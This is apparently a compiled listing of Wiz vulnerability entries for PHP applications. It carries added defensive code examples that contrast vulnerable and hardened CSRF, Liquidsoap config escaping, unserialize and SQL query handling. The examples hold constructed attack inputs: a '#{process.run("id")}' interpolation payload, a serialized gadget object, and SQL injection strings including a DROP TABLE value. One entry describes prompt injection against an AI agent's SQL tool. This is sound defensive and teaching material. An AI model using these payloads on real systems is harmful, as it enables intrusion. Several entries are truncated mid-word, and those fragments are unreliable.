CVE-2026-28508 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 9.2)
## CVE-2026-28508 [CRITICAL]: PHP vulnerability analysis and mitigation
Idno is a social publishing platform. Prior to version 1.6.4, a logic error in the API authentication flow causes the CSRF protection on the URL unfurl service endpoint to be trivially bypassed by any unauthenticated remote attacker. Combined with the absence of a login requirement on the endpoint itself, this allows an attacker to force the server to make arbitrary outbound HTTP requests to any host, including internal network addresses and cloud instance metadata services, and retrieve the response content. This issue has been patched in version 1.6.4.
Source: NVD
Score: 9.2 | Published: March 6, 2026 | Severity: CRITICAL | CNA Score: 9.2
Affected Technologies: PHP
Has Public Exploit: Yes | Has CISA KEV Exploit: No
CISA KE
CVE-2026-23622 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.7)
## CVE-2026-23622 [HIGH]: PHP vulnerability analysis and mitigation
Easy!Appointments is a self hosted appointment scheduler. In 1.5.2 and earlier, application/core/EA_Security.php::csrf_verify() only enforces CSRF for POST requests and returns early for non-POST methods. Several application endpoints perform state-changing operations while accepting parameters from GET (or $_REQUEST), so an attacker can perform CSRF by forcing a victim's browser to issue a crafted GET request. Impact: creation of admin accounts, modification of admin email/password, and full admin account takeover.
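Two things are wrong in the pattern described above: the CSRF check exempts every non-POST request, and state-changing handlers accept GET. The following is an added example, not Easy!Appointments' code, showing a POST-only `csrf_verify()` beside a version that exempts only safe methods, together with a handler that refuses to mutate state on GET. Function and parameter names are invented; the token is kept in the session in the usual way.

```php
<?php
// Added example, not Easy!Appointments' code: why enforcing CSRF only on POST
// is insufficient, and a guard that covers every state-changing request.

// Vulnerable shape: returns early for anything that is not POST, so a GET
// that mutates state is never checked.
function csrfVerifyPostOnly(string $method, array $request, string $sessionToken): bool
{
    if ($method !== 'POST') {
        return true;
    }
    return hash_equals($sessionToken, (string)($request['csrf_token'] ?? ''));
}

// Hardened shape: only truly safe methods skip the check, and the token is
// read from the POST body or a request header, never from the query string,
// so a link alone can never carry a valid token.
function csrfVerify(string $method, array $post, array $headers, string $sessionToken): bool
{
    if (in_array($method, ['GET', 'HEAD', 'OPTIONS'], true)) {
        return true; // safe methods must not change state; see the handler below
    }
    $token = $post['csrf_token'] ?? $headers['X-CSRF-Token'] ?? '';
    return $token !== '' && hash_equals($sessionToken, (string)$token);
}

// The other half of the fix: a handler that mutates state refuses GET, so a
// forced navigation cannot reach it even if the CSRF check were bypassed.
function updateAdminEmail(string $method, array $params): string
{
    if ($method !== 'POST') {
        http_response_code(405);
        return 'Method Not Allowed';
    }
    return 'email changed to ' . $params['email'];
}

$session = bin2hex(random_bytes(16));

// Forged GET carrying no token at all.
var_dump(csrfVerifyPostOnly('GET', ['email' => 'evil@example.com'], $session));
var_dump(csrfVerify('PUT', [], [], $session));
var_dump(csrfVerify('POST', ['csrf_token' => $session], [], $session));
echo updateAdminEmail('GET', ['email' => 'evil@example.com']), "\n";
```

The POST-only check accepts the forged GET outright; the hardened check rejects a tokenless PUT and accepts a POST carrying the session token, and the handler answers the GET with 405 regardless. The second half matters as much as the first: any endpoint that reads its parameters from `$_REQUEST` will happily take them from a query string, so method enforcement has to live in the handler, not only in the CSRF filter.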
Source: NVD
Score: 8.7 | Published: January 15, 2026 | Severity: HIGH | CNA Score: 8.7
Affected Technologies: PHP
Has Public Exploit: Yes | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A
CISA KEV Due Date N/
GHSA-93fx-5qgc-wr38 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz)
## GHSA-93fx-5qgc-wr38: PHP vulnerability analysis and mitigation
## Summary
Identifiers referenced in the summary: `ConfigWriter::cleanUpString()`, `#{...}`, `StationPermissions::Media`, `StationPermissions::Profile`, `process.run()`
## Root Cause
`backend/src/Radio/Backend/Liquidsoap/ConfigWriter.php`:

```php
public static function cleanUpString(?string $string): string
{
    return str_replace(['"', "\n", "\r"], ['\'', '', ''], $string ?? '');
}
```

Identifiers referenced: `"`, `'`, `#{...}`, `\`, `#{expression}`, `process.run()`
## Injection Points
| Field passed through `cleanUpString()` | Permission | Sink in generated `.liq` |
|---|---|---|
| `playlist.remote_url` | Media | `input.http("...")`, `playlist("...")` |
| `station.name` | Profile | `name = "..."` |
| `station.description` | Profile | `description = "..."` |
| `station.genre` | Profile | `genre = "..."` |
| `station.url` | Profile | `url = "..."` |
| `backend_config.live_broadcast_text` | Profile | `settings.azuracast.live_bro` |
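The root cause is that `cleanUpString()` swaps `"` for `'` (which Liquidsoap also accepts as a string delimiter) and leaves `#{...}` interpolation and backslashes alone, so a station name is still evaluated as code when the generated `.liq` loads. The following is an added example, not AzuraCast's code or patch: it reproduces the original function to show the payload passing through, and shows an alternative that escapes the value for a double-quoted Liquidsoap literal and refuses interpolation sequences outright. The escape rules assumed here (`\\` and `\"` inside a double-quoted Liquidsoap string) are an assumption about Liquidsoap syntax, and the payload is constructed.

```php
<?php
// Added example, not AzuraCast's code. Reproduces the advisory's
// cleanUpString() beside a hardened variant. Assumption: inside a
// double-quoted Liquidsoap string, backslash and double quote are escaped as
// \\ and \" respectively, and #{expr} is expanded as code.

function cleanUpStringOriginal(?string $string): string
{
    return str_replace(['"', "\n", "\r"], ['\'', '', ''], $string ?? '');
}

function cleanUpStringHardened(?string $string): string
{
    $s = str_replace(["\n", "\r"], '', $string ?? '');
    if (str_contains($s, '#{')) {
        // Liquidsoap expands #{expr} inside string literals, so a station
        // name containing it would run code. Refuse rather than rewrite it.
        throw new InvalidArgumentException('interpolation sequence not allowed');
    }
    // Escape the backslash first, then the quote, so the escapes do not
    // compound; quotes are preserved instead of being swapped for '.
    return str_replace(['\\', '"'], ['\\\\', '\\"'], $s);
}

// Emit the same `name = "..."` line the config writer produces.
function liqNameLine(?string $string): string
{
    return 'name = "' . cleanUpStringHardened($string) . '"';
}

// Constructed station name carrying an interpolated command.
$payload = 'Radio #{process.run("id")}';

// Original: the double quotes become single quotes (still a valid Liquidsoap
// string) and #{...} survives untouched.
echo cleanUpStringOriginal($payload), "\n";

// Hardened: the interpolation is rejected before it reaches the .liq file.
try {
    echo liqNameLine($payload), "\n";
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// A benign name containing a quote and a backslash is escaped, not mangled.
echo liqNameLine('Rock "n" Roll \\ Blues'), "\n";
```

Rejecting is the conservative choice for a config writer: a station name has no legitimate need for `#{`, and a rewrite that tries to defang the opener has to be right about the exact Liquidsoap lexer rules, which the escape above already depends on for quotes and backslashes. Whatever the final rule, the check belongs at the point where the value is written into the `.liq`, because the Profile and Media permissions that gate these fields are far below what running `process.run()` on the host would require.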
CVE-2025-68614 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 4.3)
## CVE-2025-68614 [MEDIUM]: PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.12.0, the Alert Rule API is vulnerable to stored cross-site scripting. Alert rules can be created or updated via LibreNMS API. The alert rule name is not properly sanitized, and can be used to inject HTML code. This issue has been patched in version 25.12.0.
Source: NVD
Score: 5.4 | Published: December 23, 2025 | Severity: MEDIUM | CNA Score: 4.3
Affected Technologies: PHP
Has Public Exploit: Yes | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: N/A (percentile N/A)
Affected packages and libraries: librenms/librenms
Sources: NVD; Composer
CVE-2026-25878 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 6.9)
## CVE-2026-25878 [MEDIUM]: PHP vulnerability analysis and mitigation
FroshAdminer is the Adminer plugin for Shopware Platform. Prior to 2.2.1, the Adminer route (/admin/adminer) was accessible without Shopware admin authentication. The route was configured with auth_required=false and performed no session validation, exposing the Adminer UI to unauthenticated users. This vulnerability is fixed in 2.2.1.
Source: NVD
Score: 6.9 | Published: February 9, 2026 | Severity: MEDIUM | CNA Score: 6.9
Affected Technologies: PHP
Has Public Exploit: No | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: N/A (percentile 10)
Affected packages and libraries: frosh/adminer-platform
Sources: NVD; Composer (Severity MEDIUM)
CVE-2025-69216 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.7)
## CVE-2025-69216 [HIGH]: PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an authenticated SQL injection vulnerability in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability exists in templates/scadenzario/init.php, where the id_anagrafica parameter is directly concatenated into an SQL query without proper sanitization. The vulnerability enables complete database read access through error-based SQL injection techniques.
Source: NVD
Score: 8.7 | Published: February 6, 2026 | Severity: HIGH | CNA Score: 8.7
Aff
CVE-2026-28426 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.7)
## CVE-2026-28426 [HIGH]: PHP vulnerability analysis and mitigation
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.11 and 6.4.0, a stored XSS vulnerability in SVG and icon related components allows authenticated users with appropriate permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. This has been fixed in 5.73.11 and 6.4.0.
Source: NVD
Score: 5.4 | Published: February 27, 2026 | Severity: MEDIUM | CNA Score: 8.7
Affected Technologies: PHP
Has Public Exploit: No | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: N/A (percentile 1.4)
Affected packages and libraries: statamic/cms
Sources: NVD; Composer Severity HI
CVE-2026-33686 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.8)
## CVE-2026-33686 [HIGH]: PHP vulnerability analysis and mitigation
Identifiers referenced: `src/Utils/FileUtil.php`, `FileUtil::explodeExtension()`, `pathinfo(PATHINFO_EXTENSION)`, `strrpos()`
Source: NVD
Score: 8.8 | Published: March 26, 2026 | Severity: HIGH | CNA Score: 8.8
Affected Technologies: PHP
Has Public Exploit: No | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: 0.1 (percentile 21.9)
Affected packages and libraries: code16/sharp
Sources: NVD; Composer (Severity HIGH, Has Fix, Added at: Mar 26, 2026)
CVE-2026-33160 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 2.7)
## CVE-2026-33160 [LOW]: PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 4.0.0-RC1 to before version 4.17.8 and from version 5.0.0-RC1 to before version 5.9.14, an unauthenticated user can call assets/generate-transform with a private assetId, receive a valid transform URL, and fetch transformed image bytes. The endpoint is anonymous and does not enforce per-asset authorization before returning the transform URL. This issue has been patched in versions 4.17.8 and 5.9.14.
Source: NVD
Score: 2.7 | Published: March 24, 2026 | Severity: LOW | CNA Score: 2.7
Affected Technologies: PHP, Craft CMS
Has Public Exploit: No | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS percentile: 12.7
CVE-2026-21449 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 7.4)
## CVE-2026-21449 [HIGH]: PHP vulnerability analysis and mitigation
Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via first name and last name from a low-privilege user. Version 2.3.10 fixes the issue.
Source: NVD
Score: 7.4 | Published: January 2, 2026 | Severity: HIGH | CNA Score: 7.4
Affected Technologies: PHP
Has Public Exploit: Yes | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: N/A (percentile 7.5)
Affected packages and libraries: bagisto/bagisto
Sources: NVD; Composer (Severity HIGH, Has Fix, Added at: Jan 03, 2026)
CVE-2026-25490 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 6.1)
## CVE-2026-25490 [MEDIUM]: PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the 'Address Line 1' field in Inventory Locations is not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Source: NVD
Score: 6.1 | Published: February 3, 2026 | Severity: MEDIUM | CNA Score: 6.1
Affected Technologies: PHP
Has Public Exploit: Yes | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS percentile: 4.5
Exploitation Probability (EPSS
CVE-2026-25483 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 6.2)
## CVE-2026-25483 [MEDIUM]: PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability exists in Craft Commerce’s Order Status History Message. The message is rendered using the |md filter, which permits raw HTML, enabling malicious script execution. If a user has database backup utility permissions (which do not require an elevated session), an attacker can exfiltrate the entire database, including all user credentials, customer PII, order history, and 2FA recovery codes. This issue has been patched in versions 4.10.1 and 5.5.2.
Source: NVD
Score: 6.2 | Published: February 3, 2026 | Severity: MEDIUM | CNA Score: 6.2
Affected Technologies: PHP
Has Public Exploit: Yes
CVE-2025-70792 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 6.1)
## CVE-2025-70792 [MEDIUM]: PHP vulnerability analysis and mitigation
Cross Site Scripting vulnerability in the "/admin/category/create" endpoint of Microweber 2.0.19. An attacker can manipulate the "rel_id" parameter in a crafted URL and lure a user with admin privileges into visiting it, achieving JavaScript code execution in the victim's browser. The issue was reported to the developers and fixed in version 2.0.20.
Source: NVD
Score: 6.1 | Published: February 5, 2026 | Severity: MEDIUM | CNA Score: 6.1
Affected Technologies: PHP
Has Public Exploit: Yes | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: N/A (percentile 4.3)
Affected packages and libraries: microweber/microweber
Sources: NVD; Composer S
CVE-2026-34381 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 7.5)
## CVE-2026-34381 [HIGH]: PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. From version 5.0.0 to before version 5.0.8, Admidio relies on adm_my_files/.htaccess to deny direct HTTP access to uploaded documents. The Docker image ships with AllowOverride None in the Apache configuration, which causes Apache to silently ignore all .htaccess files. As a result, any file uploaded to the documents module, regardless of the role-based permissions configured in the UI, is directly accessible over HTTP without authentication by anyone who knows the file path. The file path is disclosed in the upload response JSON. This issue has been patched in version 5.0.8.
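The general lesson is that an access restriction carried in `.htaccess` is only as reliable as the `AllowOverride` setting of whoever deploys the image. The following is an added Apache configuration fragment, not Admidio's; it assumes the application is served from `/var/www/html` with uploads under `adm_my_files`, as the advisory describes, and places the deny rule in the server configuration where `AllowOverride` cannot switch it off.

```apache
# Added example, not Admidio's configuration. Assumes the document root is
# /var/www/html and uploads live in adm_my_files, per the advisory.

# AllowOverride None is a sensible default (it also saves a per-request
# .htaccess lookup), but it means adm_my_files/.htaccess is never read and
# the deny rule inside it protects nothing.
<Directory "/var/www/html">
    AllowOverride None
    Require all granted
</Directory>

# So the restriction goes here instead: no direct HTTP access to uploads.
# The application hands files out through its own permission-checked
# download script, which reads from disk and is unaffected by this block.
<Directory "/var/www/html/adm_my_files">
    Require all denied
</Directory>
```

Verify the deployment rather than the config file: after `apachectl -t` and a reload, request a known upload path (the upload response JSON discloses one, per the advisory) with `curl -I` and expect 403, then confirm the same document still downloads through the application for a user who is entitled to it.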
Source: NVD
Score: 7.5 | Published: March 31, 2026 | Severity: HIGH | CNA Score: 7.5
Affected Techn
CVE-2026-33942 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.1)
## CVE-2026-33942 [HIGH]: PHP vulnerability analysis and mitigation
Saloon is a PHP library that gives users tools to build API integrations and SDKs. Versions prior to 4.0.0 used PHP's unserialize() in AccessTokenAuthenticator::unserialize() to restore OAuth token state from cache or storage, with allowed_classes => true. An attacker who can control the serialized string (e.g. by overwriting a cached token file or via another injection) can supply a serialized "gadget" object. When unserialize() runs, PHP instantiates that object and runs its magic methods (__wakeup, __destruct, etc.), leading to object injection. In environments with common dependencies (e.g. Monolog), this can be chained to remote code execution (RCE). The fix in version 4.0.0 removes PHP serialization from the AccessTokenA
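What `allowed_classes => true` hands an attacker is best seen by running it. The following is an added example, not Saloon's code: a stand-in `Gadget` class with a `__wakeup()` takes the place of a real gadget chain, and the "cached token" strings are constructed by hand. It shows the magic method firing under the permissive setting and the same blob being neutralised under `allowed_classes => false`.

```php
<?php
// Added example, not Saloon's code. Gadget is a stand-in for a real gadget
// chain (the advisory names Monolog as a common source); the serialized
// strings below are constructed by hand for the demonstration.

class Gadget
{
    public string $cmd = 'id';

    public function __wakeup(): void
    {
        // A real gadget would reach exec(), a file write or similar here.
        echo "__wakeup ran with cmd={$this->cmd}\n";
    }
}

// What the application expects to find in its cache: a plain token record.
$legit = serialize(['access_token' => 'abc', 'expires' => 1700000000]);

// What an attacker who can overwrite the cache file writes instead:
// the serialization of Gadget with cmd='id'.
$tainted = 'O:6:"Gadget":1:{s:3:"cmd";s:2:"id";}';

// The vulnerable shape: any class in the autoload path may be instantiated.
function restoreUnsafe(string $blob): mixed
{
    return unserialize($blob, ['allowed_classes' => true]);
}

// The defensive shape: no class is ever instantiated. Objects come back as
// __PHP_Incomplete_Class and no magic method runs; anything that is not the
// expected array is refused.
function restoreSafe(string $blob): mixed
{
    $value = unserialize($blob, ['allowed_classes' => false]);
    if (!is_array($value)) {
        throw new UnexpectedValueException('token record must be an array');
    }
    return $value;
}

echo "unsafe:\n";
restoreUnsafe($tainted);

echo "safe:\n";
var_dump(restoreSafe($legit)['access_token']);
try {
    restoreSafe($tainted);
} catch (UnexpectedValueException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Under the unsafe call the `__wakeup` message prints before the function even returns; under the safe call the legitimate record is restored and the tainted blob is rejected. As the advisory notes, the upstream fix goes further and removes PHP serialization from this path altogether; where state must be persisted, JSON against a known schema avoids the question of gadgets entirely, and `allowed_classes => false` is the fallback for code that cannot yet drop `unserialize()`.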
CVE-2026-31858 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.7)
## CVE-2026-31858 [HIGH]: PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). The ElementSearchController::actionSearch() endpoint is missing the unset() protection that was added to ElementIndexesController in CVE-2026-25495. The exact same SQL injection vulnerability (including criteria[orderBy], the original advisory vector) works on this controller because the fix was never applied to it. Any authenticated control panel user (no admin required) can inject arbitrary SQL via criteria[where], criteria[orderBy], or other query properties, and extract the full database contents via boolean-based blind injection. Users should update to the patched 5.9.9 release to mitigate the issue.
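Two injection shapes appear in this list: a value concatenated into a WHERE clause (the OpenSTAManager `id_anagrafica` case, CVE-2025-69216 above) and an attacker-chosen identifier in ORDER BY (the Craft `criteria[orderBy]` case here). They need different fixes, because a bound parameter can carry a value but never a column name. The following is an added example that serves both advisories and is neither project's code; the table, columns and rows are invented, and it runs against an in-memory SQLite database so it can be exercised offline (the `pdo_sqlite` extension is assumed).

```php
<?php
// Added example, not OpenSTAManager's or Craft's code. Table, columns and
// data are invented; SQLite in memory stands in for the real database.

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE scadenze (id INTEGER PRIMARY KEY, id_anagrafica INTEGER, importo REAL)');
$pdo->exec('INSERT INTO scadenze VALUES (1, 10, 100.0), (2, 11, 250.0), (3, 10, 75.5)');

// Vulnerable shape (the id_anagrafica case): the value is concatenated, so
// the input "10 OR 1=1" rewrites the WHERE clause, and an error-based payload
// would leak data through the database error text.
function dueDatesVulnerable(PDO $pdo, string $idAnagrafica): array
{
    $sql = "SELECT id, importo FROM scadenze WHERE id_anagrafica = $idAnagrafica";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed shape. The value is bound, so the whole input is compared as a single
// value. The ORDER BY column (the criteria[orderBy] case) cannot be bound, so
// user input is mapped onto a fixed set of column names and anything else is
// refused before it gets near the SQL string.
function dueDates(PDO $pdo, string $idAnagrafica, string $orderBy = 'id'): array
{
    $allowedOrder = ['id' => 'id', 'amount' => 'importo'];
    $column = $allowedOrder[$orderBy]
        ?? throw new InvalidArgumentException("unsupported orderBy: $orderBy");

    $stmt = $pdo->prepare(
        "SELECT id, importo FROM scadenze WHERE id_anagrafica = :id ORDER BY $column"
    );
    $stmt->execute([':id' => $idAnagrafica]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

printf("concatenated, payload '10 OR 1=1': %d rows\n",
    count(dueDatesVulnerable($pdo, '10 OR 1=1')));
printf("bound,        payload '10 OR 1=1': %d rows\n",
    count(dueDates($pdo, '10 OR 1=1')));
printf("bound,        id 10 ordered by amount: %d rows\n",
    count(dueDates($pdo, '10', 'amount')));
try {
    dueDates($pdo, '10', 'importo; DROP TABLE scadenze');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The concatenated query returns every row for the `10 OR 1=1` payload; the bound query returns none for it, because the database compares the whole string against the integer column, and returns the two rows for customer 10 when asked properly. The `orderBy` allowlist is the part teams most often forget: the Craft advisory above is literally a second controller that never got the identifier check its sibling received, which is the usual way this bug survives a first fix.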
Source: NVD
Score: 8.7 | Published: March 11, 2026 | Severity: HIGH
CNA Sc
GHSA-5x2w-37xf-7962 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz)
## GHSA-5x2w-37xf-7962: PHP vulnerability analysis and mitigation
## Summary
The AVideo platform exposes a publicly accessible endpoint that performs server-side PGP decryption without requiring any form of authentication. Any anonymous user can submit a private key, ciphertext, and passphrase to the endpoint and receive the decrypted plaintext in the JSON response. This functionality is entirely unprotected, meaning no session, token, or credential is needed to invoke it.
## Details
The endpoint at decryptMessage.json.php accepts a JSON body containing three user-supplied fields: a private key, an encrypted message, and a key password. The server passes these directly into a decryption routine and returns the result. There is no call to any authentication or session validation fu
CVE-2026-21861 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 9.1)
## CVE-2026-21861 [CRITICAL]: PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, baserCMS contains an OS command injection vulnerability in the core update functionality. An authenticated administrator can execute arbitrary OS commands on the server due to improper handling of user-controlled input that is directly passed to exec() without sufficient validation or escaping. This issue has been patched in version 5.2.3.
Source: NVD
Score: 7.2 | Published: March 31, 2026 | Severity: HIGH | CNA Score: 9.1
Affected Technologies: PHP
Has Public Exploit: Yes | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: 0.4 (percentile 58.9)
Affected packages and li
CVE-2026-34245 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 6.3)
## CVE-2026-34245 [MEDIUM]: PHP vulnerability analysis and mitigation
Identifier referenced: `plugin/PlayLists/View/Playlists_schedules/add.json.php`
Source: NVD
Score: 6.3 | Published: March 27, 2026 | Severity: MEDIUM | CNA Score: 6.3
Affected Technologies: PHP
Has Public Exploit: Yes | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: N/A (percentile 12.1)
Affected packages and libraries: wwbn/avideo
Sources: NVD; Composer (Severity MEDIUM, No Fix, Added at: Mar 29, 2026)
CVE-2026-33517 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.6)
## CVE-2026-33517 [HIGH]: PHP vulnerability analysis and mitigation
Identifiers referenced: `%1$s`, `$s_tag_delete_message`
Source: NVD
Score: 8.6 | Published: March 23, 2026 | Severity: HIGH | CNA Score: 8.6
Affected Technologies: PHP
Has Public Exploit: No | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: N/A (percentile 11)
Affected packages and libraries: mantisbt/mantisbt
Sources: NVD; Composer (Severity HIGH, Has Fix, Added at: Mar 26, 2026)
CVE-2026-33354 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 7.6)
## CVE-2026-33354 [HIGH]: PHP vulnerability analysis and mitigation
Identifiers referenced: `POST /objects/aVideoEncoder.json.php`, `chunkFile`, `isValidURLOrPath()`, `/var/www/`, `videos`, `.php`
Source: NVD
Score: 6.5 | Published: March 23, 2026 | Severity: MEDIUM | CNA Score: 7.6
Affected Technologies: PHP
Has Public Exploit: Yes | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: N/A (percentile 10.6)
Affected packages and libraries: wwbn/avideo
Sources: NVD; Composer (Severity HIGH, No Fix, Added at: Mar 20, 2026)
CVE-2026-27131 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 5.5)
## CVE-2026-27131 [MEDIUM]: PHP vulnerability analysis and mitigation
Identifiers referenced: `hashData()`, `devMode`, `enablePlaygroundWhenDevModeDisabled`, `false`
Source: NVD
Score: 5.5 | Published: March 23, 2026 | Severity: MEDIUM | CNA Score: 5.5
Affected Technologies: PHP
Has Public Exploit: No | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: N/A (percentile 10.8)
Affected packages and libraries: putyourlightson/craft-sprig
Sources: NVD; Composer (Severity MEDIUM, Has Fix, Added at: Mar 24, 2026)
CVE-2025-68455 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.6)
## CVE-2025-68455 [HIGH]: PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. Versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16 are vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior. Note that attackers must have administrator access to the Craft Control Panel for this to work. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.
Source: NVD
Score: 8.6 | Published: January 5, 2026 | Severity: HIGH | CNA Score: 8.6
Affected Technologies: PHP, Craft CMS
Has Public Exploit: Yes | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: 1.2 (percentile 78.7)
Affected packages and li
CVE-2025-59022 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 7.1)
## CVE-2025-59022 [HIGH]: PHP vulnerability analysis and mitigation
Backend users who had access to the recycler module could delete arbitrary data from any database table defined in the TCA - regardless of whether they had permission to that particular table. This allowed attackers to purge and destroy critical site data, effectively rendering the website unavailable. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1.
Source: NVD
Score: 7.1 | Published: January 13, 2026 | Severity: HIGH | CNA Score: 7.1
Affected Technologies: PHP, Typo3
Has Public Exploit: No | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: N/A (percentile 4.3)
Affe
CVE-2026-1217 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 5.4)
## CVE-2026-1217 [MEDIUM]: PHP vulnerability analysis and mitigation
The Yoast Duplicate Post plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the clone_bulk_action_handler() and republish_request() functions in all versions up to, and including, 4.5. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate any post on the site including private, draft, and trashed posts they shouldn't have access to. Additionally, attackers with Author-level access and above can use the Rewrite & Republish feature to overwrite any published post with their own content.
Source: NVD
Score: 5.4 | Published: March 18, 2026 | Severity: MEDIUM | CNA Score: 5.4
Affected Technologies: PHP, WordPress
Has Publ
CVE-2025-67509 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.2)
## CVE-2025-67509 [HIGH]: PHP vulnerability analysis and mitigation
Neuron is a PHP framework for creating and orchestrating AI Agents. Versions 2.8.11 and below use MySQLSelectTool, which is vulnerable to Read-Only Bypass. MySQLSelectTool is intended to be a read-only SQL tool (e.g., for LLM agent querying); however, validation based on the first keyword (e.g., SELECT) and a forbidden-keyword list does not block file-writing constructs such as INTO OUTFILE / INTO DUMPFILE. As a result, an attacker who can influence the tool input (e.g., via prompt injection through a public agent endpoint) may write arbitrary files to the DB server if the MySQL/MariaDB account has the FILE privilege and server configuration permits writes to a useful location (e.g., a web-accessible directory). This issue is f
GHSA-6mp4-q625-mxjp Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz)
## GHSA-6mp4-q625-mxjp: PHP vulnerability analysis and mitigation
## Summary
The callback and jsonp request parameters are directly concatenated into the response without any sanitization, allowing attackers to inject arbitrary JS code. When YOURLS_PRIVATE is set to false (public API mode), this vulnerability can be exploited by any unauthenticated attacker. In private mode, the XSS payload is still injected into the 403 response body, though browser execution is blocked.
## Details
`yourls-api.php:127-128`:

```php
if( isset( $_REQUEST['callback'] ) ) $return['callback'] = $_REQUEST['callback'];
elseif ( isset( $_REQUEST['jsonp'] ) ) $return['callback'] = $_REQUEST['jsonp'];
```

`includes/functions-api.php:127-128`:

```php
$callback = isset( $output['callback'] ) ? $output['callback'] : '';
$result =
```
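A JSONP callback is a JavaScript identifier and nothing else, and the response that wraps it should be served as script, not as HTML. The following is an added example, not YOURLS's code: a callback validator, a response builder that applies it, and the headers that stop the body from being interpreted as a page. The identifier grammar and length cap are assumptions about what legitimate callers need, and the inputs are constructed.

```php
<?php
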